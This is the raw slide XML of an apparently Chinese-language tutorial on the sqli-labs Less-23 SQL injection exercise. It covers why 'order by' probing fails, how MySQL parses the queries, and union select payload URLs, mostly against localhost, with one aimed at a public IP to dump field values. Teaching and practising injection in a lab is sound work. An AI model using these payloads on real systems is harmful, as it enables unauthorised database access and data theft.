            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>9. http://121.199.30.46/Less-23/?id=-1‘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;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查出字段中所有的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2516385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739436"/>
            <a:ext cx="11762509" cy="6118564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>参考链接： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/annsshadow/p/5037667.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less-23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为例，我们使用正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来查询一下一共有多少列：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-23/?id=1‘ order by 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>因为没有闭合，所以肯定会报错</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-23/?id=1‘ order by 10 and  ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回是正常的，但是由于我们已知肯定没有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列，这是为什么还会返回正常？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-23/?id=1‘ order by 10 or ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，返回依旧正常。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们回到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>命令行，执行以下语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.  select * from users where id =1 ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回数据肯定是正常的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. select * from users where id =1  and 1=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回数据也是正常的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. select * from users where id =1  or  1=1;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回了所有的数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. select * from users where id =11111  or  1=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时也是返回了所有的数据。 说明执行的时候是  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>A or B </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. select * from users where id =1 order by 3; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回正常，肯定正常。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. select * from users where id =1  order by 3 and 1=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时依旧返回正常。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * from users where id =1  order by 4444 and 1=1;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051559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904300"/>
            <a:ext cx="11762509" cy="3629891"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8.    select * from users where id =1  order by 4444 or  1=1;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>依旧返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>9.  select * from users where id =1  and 1=1 order by 3;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时返回正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>10. select * from users where id =1  and 1=1 order by 3333;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回不存在这个列，也可以理解为正常。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>11. select * from users where id =1111  and 1=1 order by 3;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回为空，但是语句执行正常。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0FE4DA-8E5B-4A45-89C7-7708D316B3AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="597216" y="3637548"/>
            <a:ext cx="6690557" cy="3006437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE61FC64-71C4-4527-847A-1CCB034112B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7606145" y="4239491"/>
            <a:ext cx="3988639" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你可以理解为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在执行的时候被忽略了，这是由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解析顺序决定的。具体参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> ： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/annsshadow/p/5037667.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2552973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75354"/>
            <a:ext cx="11762509" cy="4956173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-23/?id=1‘ order by 10 or ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>已知这种构造是错误的，但是如何使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句进行报错呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. select * from users where id =1 and 1=1 order by 10; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句中，我们可以使用这种语法，原因是因为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1 and 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的条件，被执行之后得到结果，然后执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，因为结果中没有第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>个字段所有报错了。在第二个查询语句中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的条件中，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>执行时被忽略了，得到结果之后并未再执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>但是针对本题中：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.  http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-23/?id=1‘ or ’1‘=’1 order by 10  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SELECT * FROM users WHERE id=‘1’ or ‘1’=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘1 order by 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ LIMIT 0,1    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们知道永远都不可能有报错的情况，所以对此，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中建议使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-23/?id=1111‘  union select 1,2,3,4 and ’1‘=‘1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用这样的，或者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，这是因为这里的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作为了联合查询第二个语句的条件而不是第一个语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的条件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B337674F-5357-4ECD-850C-7DD841B94A20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="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404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="-apple-system"/>
              </a:rPr>
              <a:t>这里的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="-apple-system"/>
              </a:rPr>
              <a:t>作为了联合查询第二个语句的条件而不是第一个语句</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:effectLst/>
                <a:ea typeface="-apple-system"/>
              </a:rPr>
              <a:t>的条件。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="11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760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207819"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-23_03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983673"/>
            <a:ext cx="11762509" cy="5355312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Less-23/?id=1‘ and  ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>都可以</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我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行闭合，其中要在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的位置进行闭合操作，但是在页面上没有显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1,2,3</a:t>
            </a:r>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此时我们将前面的值进行报错，使得前面的值无法被查询到</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此时我们看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位置有回显信息，我们可以选择使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2,3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>位置继续进行注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
